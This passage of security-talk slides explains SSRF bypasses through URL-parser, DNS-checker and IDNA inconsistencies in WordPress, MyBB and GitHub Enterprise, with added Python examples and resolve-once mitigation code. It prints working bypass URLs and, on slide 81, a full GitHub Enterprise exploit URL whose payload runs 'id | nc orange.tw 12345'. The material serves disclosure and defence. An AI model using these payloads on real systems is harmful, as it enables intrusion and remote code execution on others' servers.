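    """Host string to hand to the requester, or ValueError.

    Non-ASCII input is converted explicitly and refused if the conversion
    collapses it onto a plain ASCII name, so "wordpreß.com" never silently
    becomes "wordpress.com" somewhere downstream of the check."""
    if folds_to_plain_ascii(host):
        raise ValueError("%r normalises to %r; refusing the disguised form"
                         % (host, to_alabel(host)))
    return to_alabel(host)


# Constructed samples: the three rows of the table, the slide's WordPress
# host, and one legitimate IDN.
SAMPLES = ["ⓖⓞⓞⓖⓛⓔ.com", "g\u200doogle.com", "baß.de", "wordpreß.com", "bücher.de"]

if __name__ == "__main__":
    blocklist = {"google.com", "wordpress.com"}
    for h in SAMPLES:
        print("%-16s -> %-20s naive=%s canonical=%s spoof=%s" % (
            h, to_alabel(h), is_blocked_naive(h, blocklist),
            is_blocked_canonical(h, blocklist), folds_to_plain_ascii(h)))
```

Whichever generation of IDNA the requester implements, the check must run on the exact ASCII string the requester will resolve; converting once at the boundary and passing only that A-label onwards removes the parser/requester disagreement the slide describes.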
64. Abusing URL Parsers - Case Study
WordPress
1. Pays a lot of attention to SSRF protections
2. We found 3 distinct ways to bypass the protections
3. Bugs have been reported since Feb. 25, 2017 but are still unpatched
4. To respect the responsible disclosure process, I will use MyBB for the
following case study
65. Abusing URL Parsers - Case Study
The main concept is finding different behaviors among the URL
parser, the DNS checker and the URL requester
             URL parser    DNS checker        URL requester
WordPress    parse_url()   gethostbyname()    cURL*
vBulletin    parse_url()   None               cURL*
MyBB         parse_url()   gethostbynamel()   cURL*
* cURL is the first-priority requester when available
67. Abusing URL Parsers - Case Study
The attacker submits http://foo.orange.tw/ and controls the DNS for foo.orange.tw,
so the checker and the requester get different answers (a DNS rebinding race)
1. MyBB calls gethostbyname() and gets 1.2.3.4
   Q: foo.orange.tw  A: 1.2.3.4
2. MyBB checks that 1.2.3.4 is not in the blacklist
3. MyBB fetches the URL by curl_init(), and
   cURL queries DNS again!
   Q: foo.orange.tw  A: 127.0.0.1
4. 127.0.0.1 fetched, SSRF!
68. Abusing URL Parsers - Case Study
SSRF-Bypass tech #2
The inconsistency between DNS checker and URL requester
There is no IDNA converter in gethostbynamel(), but cURL has one
$url = 'http://ß.orange.tw/'; // resolves to 127.0.0.1 once IDNA-converted

$host = parse_url($url)['host'];
$addresses = gethostbynamel($host); // bool(false): the raw "ß" label does not resolve
if ($addresses) {
    // check if address in white-list (never reached)
}

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url); // cURL converts ß.orange.tw via IDNA itself
curl_exec($ch);                       // and fetches 127.0.0.1
69. Abusing URL Parsers - Case Study
SSRF-Bypass tech #3
The inconsistency between URL parser and URL requester
Fixed in PHP 7.0.13
…127.0.0.1:11211 fetched
$url = 'http://127.0.0.1:11211#@google.com:80/';
$parsed = parse_url($url);
var_dump($parsed['host']); // string(10) "google.com"
var_dump($parsed['port']); // int(80)
curl($url); // shorthand for curl_init/curl_setopt/curl_exec as above
70. Abusing URL Parsers - Case Study
SSRF-Bypass tech #3
The inconsistency between URL parser and URL requester
Fixed in cURL 7.54 (the libcurl shipped in Ubuntu 17.04 is still 7.52.1)
$url = 'http://foo@127.0.0.1:11211@google.com:80/';
$parsed = parse_url($url);
var_dump($parsed['host']); // string(10) "google.com"
var_dump($parsed['port']); // int(80)
curl($url);
…127.0.0.1:11211 fetched
71. Abusing URL Parsers - Case Study
SSRF-Bypass tech #3
The inconsistency between URL parser and URL requester
cURL won't fix :)
$url = 'http://foo@127.0.0.1 @google.com:11211/';
$parsed = parse_url($url);
var_dump($parsed['host']); // string(10) "google.com"
var_dump($parsed['port']); // int(11211)
curl($url);
…127.0.0.1:11211 fetched
72. Protocol Smuggling - Case Study
GitHub Enterprise
Standalone version of GitHub
Written in Ruby on Rails, and the code is obfuscated
73. Protocol Smuggling - Case Study
About Remote Code Execution on GitHub Enterprise
Best report in GitHub 3rd Bug Bounty Anniversary Promotion!
Chaining 4 vulnerabilities into RCE
74. Protocol Smuggling - Case Study
First bug - SSRF-Bypass on Webhooks
What is Webhooks?
75. Protocol Smuggling - Case Study
First bug - SSRF-Bypass on Webhooks
Fetching URL by gem faraday
Blacklisting Host by gem faraday-restrict-ip-addresses
Blacklist localhost, 127.0.0.1… ETC
Simply bypassed with a zero
http://0/
76. Protocol Smuggling - Case Study
First bug - SSRF-Bypass on Webhooks
There are several limitations in this SSRF
302 redirects are not followed
No scheme other than HTTP and HTTPS is allowed
No CR-LF injection in faraday
Only the POST method
77. Protocol Smuggling - Case Study
Second bug - SSRF in internal Graphite service
GitHub Enterprise uses Graphite to draw charts
Graphite is bound on 127.0.0.1:8000
from urlparse import urlsplit
from httplib import HTTPConnection
url = request.GET['url']
proto, server, path, query, frag = urlsplit(url)
if query: path += '?' + query
conn = HTTPConnection(server)  # host and port come straight from the user's URL
conn.request('GET', path)      # and so does the path, CR-LF included
resp = conn.getresponse()
79. Protocol Smuggling - Case Study
Third bug - CR-LF Injection in Graphite
Graphite is written in Python
The implementation of the second SSRF is httplib.HTTPConnection
As I mentioned before, httplib suffers from CR-LF Injection
We can smuggle other protocols with URL
http://0:8000/composer/send_email
?to=orange@chroot.org
&url=http://127.0.0.1:6379/%0D%0ASET…
80. Protocol Smuggling - Case Study
Fourth bug - Unsafe Marshal in Memcached gem
GitHub Enterprise uses the Memcached gem as the cache client
All Ruby objects stored in the cache are serialized with Marshal and deserialized on read
81. Protocol Smuggling - Case Study
http://0:8000/composer/send_email
?to=orange@chroot.org
&url=http://127.0.0.1:11211/%0D%0Aset%20githubproductionsearch/queries/code_query%3A857be82362ba02525cef496458ffb09cf30f6256%3Av3%3Acount%200%2060%20150%0D%0A%04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%07%3A%0E%40instanceo%3A%08ERB%07%3A%09%40srcI%22%1E%60id%20%7C%20nc%20orange.tw%2012345%60%06%3A%06ET%3A%0C%40linenoi%00%3A%0C%40method%3A%0Bresult%0D%0A%0D%0A
The pieces, left to right: the first SSRF (Graphite's send_email endpoint reached through the webhook), the second SSRF (the url parameter that Graphite fetches), the smuggled Memcached protocol (the set command injected through CR-LF), and the Marshal data (a serialized ERB object whose source runs `id | nc orange.tw 12345`)
$12,500
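The chain's inner step, rebuilt as an added example on constructed data (not code from the slides or from GitHub Enterprise, Graphite or Memcached): a Memcached "set" is percent-encoded into the url parameter of Graphite's send_email endpoint, Django decodes the query string once, a Python 2 style URL split leaves the decoded CR-LF in the path, httplib writes that path straight into the request line, and a text-protocol Memcached reads the result one line at a time. memcached_parse() is a simplified model of the server (only "set" is implemented; every other line answers ERROR), the key and value are invented, and the real payload (a Marshal-ed ERB object) is deliberately not reproduced. Python 3's urlsplit() is not used on the inner URL on purpose: since 3.9.5 it silently strips CR and LF, which is exactly the difference between the vulnerable library and the current one.

```python
"""How the Graphite CR-LF injection becomes a Memcached "set"."""
from urllib.parse import parse_qs, quote, urlsplit


def memcached_set_command(key, value, flags=0, exptime=60):
    """Text-protocol 'set' with the data block and its exact byte length."""
    header = "set %s %d %d %d\r\n" % (key, flags, exptime, len(value))
    return header.encode("ascii") + value + b"\r\n"


def build_inner_url(target_host, port, smuggled):
    """URL for the second SSRF: a CR-LF terminates the 'GET /' request line
    and the smuggled bytes follow, percent-encoded exactly once so that the
    outer query string carries them intact."""
    return "http://%s:%d/%s" % (target_host, port, quote(b"\r\n" + smuggled, safe=""))


def build_outer_url(graphite_host, inner_url):
    """URL for the first SSRF (the webhook target). inner_url is embedded as
    is: its single layer of percent-encoding is undone by request.GET."""
    return "http://%s/composer/send_email?to=%s&url=%s" % (
        graphite_host, quote("orange@chroot.org", safe=""), inner_url)


def py2_style_split(url):
    """Netloc/path split the way Python 2's urlsplit did it: no control
    character stripping. Only http:// URLs are handled here."""
    rest = url[len("http://"):]
    i = rest.find("/")
    return (rest, "/") if i == -1 else (rest[:i], rest[i:])


def py2_httplib_request(url):
    """Modelled bytes Python 2 httplib put on the wire for
    conn.request('GET', path) with the path taken verbatim from the URL."""
    netloc, path = py2_style_split(url)
    return ("GET %s HTTP/1.1\r\nHost: %s\r\nAccept-Encoding: identity\r\n\r\n"
            % (path, netloc)).encode("latin-1")


def memcached_parse(raw):
    """Simplified Memcached text-protocol reader: returns (responses, store)."""
    store, responses = {}, []
    lines = raw.split(b"\r\n")
    i = 0
    while i < len(lines):
        parts = lines[i].split()
        i += 1
        if not parts:
            continue
        if parts[0] == b"set" and len(parts) >= 5 and parts[4].isdigit():
            key, nbytes = parts[1].decode("ascii"), int(parts[4])
            data = lines[i] if i < len(lines) else b""
            i += 1
            if len(data) == nbytes:
                store[key] = data
                responses.append(b"STORED")
            else:
                responses.append(b"CLIENT_ERROR bad data chunk")
        else:
            responses.append(b"ERROR")  # "GET /", " HTTP/1.1", "Host: ..."
    return responses, store


def run_chain(key="rails/cache/demo", value=b"constructed-value"):
    """Walk the chain end to end and return (store, memcached responses)."""
    inner = build_inner_url("127.0.0.1", 11211, memcached_set_command(key, value))
    outer = build_outer_url("0:8000", inner)
    # Graphite: request.GET['url'] is one level of query-string decoding.
    decoded_url = parse_qs(urlsplit(outer).query)["url"][0]
    raw = py2_httplib_request(decoded_url)
    responses, store = memcached_parse(raw)
    return store, responses


if __name__ == "__main__":
    store, responses = run_chain()
    print(responses)
    print(store)
```

Memcached answers ERROR to the HTTP request line and headers but stores the key in between, which is why the HTTP wrapper costs the attacker nothing; the cache client later reads that key and hands the bytes to Marshal.load, the fourth bug.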
85. Mitigations
Application layer
Resolve the hostname once, then use only that IP and hostname for the request; do not reuse the input URL
Network layer
Use a firewall or network policy to block traffic to the intranet
Projects
SafeCurl by @fin1te
Advocate by @JordanMilne
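The application-layer mitigation above, as an added example (not code from the slides, SafeCurl or Advocate), written against the MyBB case on slide 67: the DNS checker resolved the name once and cURL resolved it again. pin_and_check() resolves through an injectable resolver so the race can be shown offline, and the second answer is simply never asked for; fetch_pinned() then opens the TCP connection to the pinned IP and puts the hostname only in the Host header. The resolver interface, the blocklist policy and the rebinding stand-in are this example's assumptions.

```python
"""Resolve once, check once, connect to the checked address."""
import http.client
import ipaddress
import socket
from urllib.parse import urlsplit


def is_public_ip(text):
    """True only for a globally routable unicast address. IPv4-mapped IPv6
    (::ffff:127.0.0.1) is unwrapped first so it cannot hide a loopback."""
    addr = ipaddress.ip_address(text)
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return addr.is_global and not (addr.is_multicast or addr.is_reserved)


def default_resolver(host):
    """Every address the system resolver returns for host (A and AAAA)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def pin_and_check(host, resolver=default_resolver):
    """Resolve host exactly once and return the single address to use, or
    raise ValueError. Every answer must be public: a name that mixes public
    and private answers is refused, not partially allowed."""
    addresses = resolver(host)
    if not addresses:
        raise ValueError("%r did not resolve" % host)
    bad = [a for a in addresses if not is_public_ip(a)]
    if bad:
        raise ValueError("%r resolves to non-public %s" % (host, bad))
    return addresses[0]


def fetch_pinned(url, resolver=default_resolver, timeout=5):
    """GET url by connecting to the pinned IP; the hostname goes only into
    the Host header, so no second DNS lookup can change the destination."""
    parts = urlsplit(url)
    if parts.scheme != "http" or not parts.hostname:
        raise ValueError("only plain http URLs are handled in this example")
    pinned = pin_and_check(parts.hostname, resolver)
    conn = http.client.HTTPConnection(pinned, parts.port or 80, timeout=timeout)
    path = parts.path or "/"
    if parts.query:
        path += "?" + parts.query
    conn.request("GET", path, headers={"Host": parts.netloc})
    resp = conn.getresponse()
    return resp.status, resp.read()


class RebindingResolver:
    """Constructed stand-in for the attacker's DNS server on slide 67:
    answers 1.2.3.4 to the first query and 127.0.0.1 to every later one."""

    def __init__(self):
        self.queries = 0

    def __call__(self, host):
        self.queries += 1
        return ["1.2.3.4"] if self.queries == 1 else ["127.0.0.1"]


if __name__ == "__main__":
    r = RebindingResolver()
    print("pinned:", pin_and_check("foo.orange.tw", r), "queries:", r.queries)
    for ip in ("1.2.3.4", "127.0.0.1", "0.0.0.0", "169.254.169.254", "::ffff:127.0.0.1"):
        print(ip, is_public_ip(ip))
```

For https the same pinning works by opening the socket to the IP and wrapping it with ssl.SSLContext.wrap_socket(sock, server_hostname=host), so SNI and certificate validation still use the name; redirects must go through pin_and_check() again rather than being followed by the client library, since each Location header is a fresh input URL.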
86. Black Hat Sound Bytes
New Attack Surface on SSRF-Bypass
URL Parsing Issues
Abusing IDNA Standard
New Attack Vector on Protocol Smuggling
Linux Glibc NSS Features
NodeJS Unicode Failure
Case Studies
87. Further works
URL parser issues in OAuth
URL parser issues in modern browsers
URL parser issues in Proxy server
More...
88. Acknowledgements
1. Invalid URL parsing with '#'
by @bagder
2. URL Interop
by @bagder
3. Shibuya.XSS #8
by @mala
4. SSRF Bible
by @Wallarm
5. Special Thanks
Allen Own
Birdman Chiu
Henry Huang